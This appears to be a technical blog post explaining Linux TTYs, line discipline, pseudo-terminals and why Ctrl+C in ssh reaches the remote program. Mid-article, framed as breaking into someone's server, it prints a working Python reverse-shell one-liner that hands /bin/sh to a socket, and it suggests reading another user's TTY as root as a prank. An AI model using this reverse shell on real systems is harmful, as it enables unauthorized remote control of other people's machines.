Let’s start with an interview question: We know that there are some common shortcuts in the terminal, Ctrl+E to move to the end of a line, Ctrl+W to delete a word, Ctrl+B to move a letter forward, and pressing the up key to bring up the last shell command used. Among these 4 shortcuts, there is one that is implemented differently from the others, which one is it?

The answer is Ctrl+W. Because Ctrl+W is provided by something called TTY, and the other three are provided by the shell. Okay, I admit that I might get beaten up for asking someone such a question, but here it is just to catch the reader’s interest.

Let’s look at another interesting question: If you are on host1 and logged into host2 using the ssh command, and then executed the sleep 9999 command. What happens when you press Ctrl+C at this time?

  1. ssh on host1 will be stopped
  2. the sleep command on host2 will be stopped and the ssh session will remain

Anyone who has used the ssh command should know that the phenomenon is (2) that we can just Ctrl+C inside the shell provided by ssh without any effect on ssh.

So how does this work?

We know that Ctrl+C sends a signal with an int value of 2, called SIGINT. So we can guess: is it possible that the ssh process received the SIGINT and forwarded it to the ssh remote program, but won’t handle the signal itself?

We can verify this conjecture using the killsnoop program, which prints out the signals between processes.

First we start the killsnoop program.

1
2
3
root@vagrant:/home/vagrant# ./perf-tools/killsnoop
Tracing kill()s. Ctrl-C to end.
COMM             PID    TPID     SIGNAL     RETURN

Then open a new shell, press Ctrl+C and you will see that the shell (pid=1549) received signal=2, i.e. SIGINT.

1
2
3
4
5
6
7
8
9
vagrant@vagrant:~$ ps
    PID TTY          TIME CMD
   1549 pts/1    00:00:00 bash
   1644 pts/1    00:00:00 ps
vagrant@vagrant:~$ ^C
root@vagrant:/home/vagrant# ./perf-tools/killsnoop
Tracing kill()s. Ctrl-C to end.
COMM             PID    TPID     SIGNAL     RETURN
bash             1549   1549     2          0
1
2
3
4
root@vagrant:/home/vagrant# ./perf-tools/killsnoop
Tracing kill()s. Ctrl-C to end.
COMM             PID    TPID     SIGNAL     RETURN
bash             1549   1549     2          0

Then we ssh to the local machine and press Ctrl+C inside ssh :

1
2
3
4
5
vagrant@vagrant:~$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 
vagrant@vagrant:~$ ^C

If our guess is correct, the shell (pid=1549) should still be receiving SIGINT and forwarding it to the ssh process.

But killsnoop shows that only the shell that ssh opened received SIGINT, the ssh process itself and the original shell with pid=1549 did not receive any.

1
2
3
systemd-udevd    392    1653     15         0
systemd-udevd    392    1664     15         0
bash             1689   1689     2          0

Obviously, our conjecture is not valid. So how is it possible that Ctrl+C does not affect ssh itself but affects the programs inside ssh? I believe that you will have an answer after reading this article.

Hopefully, it has attracted enough interest to start with TTY, so let’s start the archaeology now.

TTY is a product of history

The first thing to be clear is that TTY is a historical artifact. Just like Unix systems now have so many /bin directories. It’s because many programs exist by default, older programs need them to run, and newer programs will be compatible with them by default. If you write a completely redesigned Terminal or directory organization without regard to historical reasons and compatibility, you don’t need so many /bins and you don’t need TTYs.

Here’s a brief history of the time when TTY was needed and why it was indispensable in that case, along with the various subcomponents.

The full name of TTY is Teletype, what is Teletype?

Teletype

This, then, is Teletype.

This video shows how it works.

There is also a Twitter account called Teletype Model 33 that posts related content, such as this git push video on Teletype.

Simply put, a long time ago, many people used one computer together (you’ve heard of Unix as a multi-user, multi-tasking operating system, right?) . Everyone had a “terminal” (Terminal, TTY, in this context). Here you type down the command you want to run, send it to the system for execution, get the result from the system, and print the result on paper.

So, at the time, TTY was a piece of hardware, and as a piece of hardware, how was it connected to the computer?

First there is a wire, but this wire is not actually connected directly to the computer, but to a piece of hardware called a Universal Asynchronous Receiver and Transmitter (UART). the UART Driver can read information from the hardware and send it to the TTY Driver. the TTY reads from it TTY reads it from it and sends it to the program. (In fact, UARTs are still in use today, so if you’ve played with Arduino or Raspberry Pi, you may have come across them.)

Something like this.

TTY

Up to this point, it’s actually relatively straightforward for us “modern people”. The input from the hardware is copied through the Driver layer by layer to the application.

Wait, there is something called “Line discipline” on top. What the hell is that?

As its name says, it is used to “discipline” the line. The command is actually stored in the TTY after it is typed and before the Enter key is pressed. A line that exists in TTY can be “disciplined” by Line discipline. For example, it provides the function to delete by Ctrl+U, that is, after you press Ctrl+U, TTY will not send characters to the following program, but will delete the whole line in the current cache. Similarly, Ctrl+W deletes a character, a feature provided by Line discipline. (Wow! Now you pass my interview!) I’ll prove later that this is a TTY feature.

This function is simply too boring for us “modern” people. Can’t we just leave it to bash? Is it necessary to handle such things as a subsystem of the Kernel?

Whenever you want to criticize someone, remember that not all people in this world have the same advantages you have.

Yes, back in the days of Unix, there was no such condition.

A long time ago, it was too tiring for computers to read in every character and send it immediately to the program that followed. If 20 people were typing at 60 words per minute, it would take about 100 context switches and disk swaps per second, so the computer would spend 100% of its time processing these people’s keystrokes and would have no time to do anything else. (PS This is actually what I can see from dev.to a comment, it’s really wonderful, I read a lot of articles before I saw this comment but I didn’t understand why I needed Line discipline.)

The biggest use of Line discipline is actually a programmable middleman. It can buffer the contents of 20 TTYs until one person presses Enter, then it actually sends the contents to the back-end program. A Line discipline module can cache 20 TTYs, so if we need 30s to enter a command, that’s about 1.5s per user. That’s almost 100 times faster.

Line discipline works a bit like Emacs, with a function table of size=127, and each key has a bound function. For example: enter buffer; send command out, etc.

You can set TTY to raw mode, so that Line discipline will not interpret the characters it receives, but will send them directly to the program behind it (the foreground process group, session, to be exact) (in fact, this is the reason why ssh does not receive SIGINT, but the program inside ssh does. (I’ll show you later). Nowadays, many programs use raw mode for TTY, such as ssh and Vim. But a long time ago, Vim ran in cooked mode (i.e., Line discipline worked). When you typed some text in the middle of a line, like asdffwefs, the screen would go haywire and the text would overwrite what came after it until you pressed Esc to exit editing.

Today’s computers have become a million times more powerful than the hardware of that time, so Line discipline has little meaning. But at that time, if one wanted to delete and edit the currently typed command, where was the most appropriate place to implement this function? Obviously the buffer!

The performance issues here are history, but TTY and Line discipline are here to stay because (I’m guessing) many programs are written with TTY by default, such as bash, and TTY continues to retain Line discipline without the user feeling anything about it.

So what exactly is a TTY today? Essentially, it is no longer a piece of hardware, but just a piece of software (kernel subsystem). At the user level of the system, it is - a file. Of course, what is not a file in Unix?

The tty command allows you to see which TTY is used by the current shell.

As a “file”, you can write directly to it. The content written to the TTY will be read out by the output device. (The diagram below shows the shell writing below and appearing in the shell above)

tty

Of course, it’s possible to read. But when you read from the TTY, you are in competition with the output device, because you are both trying to read from this TTY, which had only one reader, and now has two. I pressed the numbers 1-9 in the shell above, and each time I entered a number I wasn’t sure which side it would be read from.

tty

Once it is read by cat, the key you pressed will not be displayed in the current shell.

Got a bad, bad idea? Yes, we can use the w command to see who is logged in to the machine, then go to cat their TTY and they will surely think their keyboard is broken! (Tip, when a user logs in, the TTY file permissions used will be set to read and write only to themselves, and the owner set to himself, so you have to be root for this prank to work!)

tty

Having understood what TTY is, what is it good for today?

We can think about this question in reverse: Can we do without TTY?

The answer is yes.

I can demonstrate that you can use the terminal without TTY.

Imagine a scenario where you break into someone’s machine, such as the server where kawabangga.com is located, and you find a way to execute python code inside it, but you can only inject the code into it and execute it without seeing the output, what do you do?

There is something called reverse shell. In layman’s terms, our ssh is usually a shell that we run to a remote computer to control, and reverse, as the name implies, is a shell that I open on a remote machine and then give it to you to control.

For the following demonstration, I opened a tcp port in the following terminal using nc, and then executed the following command in the terminal above.

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python

You can see that this python code actually opens a sh program and then connects stdin/stdout/stderr all to the tcp socket. For the nc end, the stdin/stdout/stderr of the nc sends into the socket, so my nc becomes a shell that can control the other side!

This way, I can execute commands on the other side’s host at will, very convenient!

shell

It is possible to open reverse shell using other languages.

As you can see from the image above, this is a shell without TTY. what’s wrong with it? Let’s run a TUI program, like htop.

htop

Note the problem in the top left corner, it is actually trying to hit hostname after pressing q, and sh has lost its mind and can’t even display the characters I hit properly. In addition, this shell without TTY has the following disadvantages:

  1. it can’t use TUI programs like Vim, htop, etc.
  2. can’t use tab completion
  3. you can’t use the up arrow to see the history command
  4. no job control
  5. ……

(Actually, reverse shell can also have TTY)

So, today, we can run an incomplete shell without TTY, after all, our hardware today has nothing to do with teletyping.

However, TTY still serves an important function as a kernel module. Terminal can tell TTY to move the pointer, clear the screen, reset the size, and so on.

Eh? Wait a minute, why do the tty commands we see in the image above start with /dev/pts/ and not /dev/tty? What’s the difference?

This is actually a “pretend” TTY, called Pseudo terminal.

I don’t know if you realize that one of the important points about TTY we discussed above is that TTY is a module (subsystem, drive) of the kernel, and TTY is in kernel space, not user space, so how can our modern Terminal programs, ssh programs, etc., interact with TTY?

The answer is PTY.

The explanation will be simplified here to make it easier to understand. When a program like iTerm2 needs a TTY, it asks the Kernel to create a PTY pair for it. Note that it is a pair, which means that PTYs always come in pairs. The slave is given to the program (as mentioned earlier, programs like bash assume the existence of a TTY by default and work with it in an interactive state), and the program does not know whether it is a PTY slave or a real TTY, it just reads and writes. The PTY master is returned to the program that asked for it (usually ssh, terminal emulator graphics software, tmux, etc.), which gets it (actually an fd) and can read and write the master PTY. The kernel is responsible for copying the contents of the master PTY to the slave PTY, and the contents of the slave PTY to the master PTY. pts means pseudo-terminal slave, which means that the login device of these interactive shells device is the pseudo-terminal slave.

1
terminal emulator - pty master <-- TTY driver( copies stuff from/to) --> pty slave - shell

So, the programs we see under the GUI, like Xterm/iTerm2 (which actually uses ttyS, so I won’t go into details here), like the shell opened in tmux, like the ssh opened shell, all of them are PTY. So, these terminals under the GUI, similar to konsole, Xterm, are called “terminal emulators”, they are not real terminals, they are emulated.

How do I get to a real TTY? Simple, in Ubuntu desktop system, Ctrl+Alt+F1 pressed, is a graphical interface, but Ctrl+Alt+F2 (actually F2-F6 are), is a terminal, this terminal, is TTY, you log in there and press tty command, it will tell you this is tty device up.

I happen to have a virtualbox virtual machine, only command line, no GUI, log in, then you can see that this is a TTY.

tty

Finally, let’s go back to the second question at the beginning of this article: Why does pressing Ctrl+C in ssh not stop ssh, but stops the programs inside ssh?

Let’s review what happened when we pressed Ctrl+C locally.

  1. the kernel driver receives the Ctrl+C input, ignoring any unrelated modules in between.
  2. then it reaches TTY, TTY receives this input and sends a SIGINT signal to the current process group in the foreground of TTY (in fact, it sends it to whichever session TTY is currently assigned to). if bash is currently in the foreground, bash will receive this signal, and if it is sleep, then sleep will receive it.

Since SIGTERM is a signal that can be handled by the program itself, bash decides to ignore it after receiving it, and sleep exits after receiving it.

ssh

The stty program allows us to modify tty’s function table, Ctrl+C Here it is about a function called isig.

[-] isig

enable interrupt, quit, and suspend special characters

-from man isig

This actually means that if TTY receives an input like Ctrl+C (the original symbol is ^C, correspondingly, you can use the stty -a command to check, the default quit is ^\ and the default suspend is ^Z), instead of sending it to the program behind it, convert it to SIGINT and send it to the process group behind the current TTY . So we can use stty -isig to turn off this behavior.

Now, if you press Ctrl+C in the sleep program, TTY will send the ^C character to the sleep program as is, and sleep will not receive any signal. We can’t use Ctrl+C to end the sleep program.

Ctrl+C

Back to the ssh problem, our reasonable guess is that ssh will first disable isig for the shell it is currently in when it gets the remote shell, so that Ctrl+C will be sent to ssh as a character, the ssh client will send this character to the remote ssh server, ssh server sends it to its own TTY (which is actually a PTY master), and finally the remote TTY sends a SIGINT signal to the current remote foreground process.

How can we verify our suspicions?

Verification 1

We can use stty to check the TTY settings of the shell, and then use this shell to log in via ssh and check the TTY settings again.

stty

In this diagram, we use the shell above to view the shell TTY configuration below. You can see that the first view is before the ssh login and isig is on. The second view is after the ssh login, isig becomes off. If ssh logs out, isig becomes on again.

Verification 2

To prove the opposite, if we force the TTY where ssh is located to turn isig on before the ssh login, then pressing Ctrl-C will end the ssh process itself, not the program running inside ssh.

Since I’m using ssh to log in locally, I’ve changed the command line prompt of the local shell to distinguish between the current local shell and ssh.

ssh

This image is from ssh after logging in and running stty --file /dev/pts/0 isig in another shell to open isig on the shell where ssh is located. Then press Ctrl+C in ssh (the current foreground program is sleep 9999). At this point ssh exits directly, and we are back in the local shell, rather than ending sleep in ssh.

Verification 3

We can use the strace program directly to trace the ssh system calls.

1
strace -o strace.log ssh [email protected]

You can see that when ssh starts, there is a line that says

1
ioctl(0, SNDCTL_TMR_STOP or TCSETSW, {B9600 -opost -isig -icanon -echo ...}) = 0

is changing the TTY setting to -isig, and some other settings.

Then, when ssh exits, there is a line that says

1
ioctl(0, SNDCTL_TMR_STOP or TCSETSW, {B9600 opost isig icanon echo ...}) = 0

Change the settings back.

In fact, if you use Terminal enough, you must have encountered this situation: after running some TUI program, it exits abnormally (for example, it gets stuck, crashes, or gets SIGKILL), and then you go to Terminal and find that Terminal is all messed up, carriage return does not work, Ctrl+W does not work, and so on. This is probably because the program did not execute the reset tty code that should have been executed at the time of exit. Use the reset command to reset the current Terminal and bring it back to its senses.

reset

So back to the first question, how do you prove which shortcuts are provided by TTY and which are provided by the shell?

This is even easier, in fact stty -a already prints out all the stty configurations

1
2
3
4
5
6
7
8
stty -a
speed 9600 baud; rows 52; columns 187; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe -echok -echonl -noflsh -xcase -tostop -ech

In raw mode, even the Enter key is newline, and will not give you the ability to move the cursor to the beginning of the line.

raw mode

If you cancel Ctril+W, this function is naturally gone. Typing a Ctrl+W is really a ^W.

Ctril+W

What about those shell shortcuts (like Ctrl+E)? We can use the sh program to verify that they are functions provided by the shell, not by TTY. sh is a very silly program and does not explain the Ctrl+A or up keys. Pressing the left arrow brings up ^[[D and pressing Ctrl+A brings up ^A (it feels like many people have seen these characters before, and when the shell is stuck, pressing the arrow will put these raw characters on the screen). However, under normal TTY (cooked TTY, you can use reset command to restore the TTY we played with before), Ctrl+W function is still available under sh.

ssh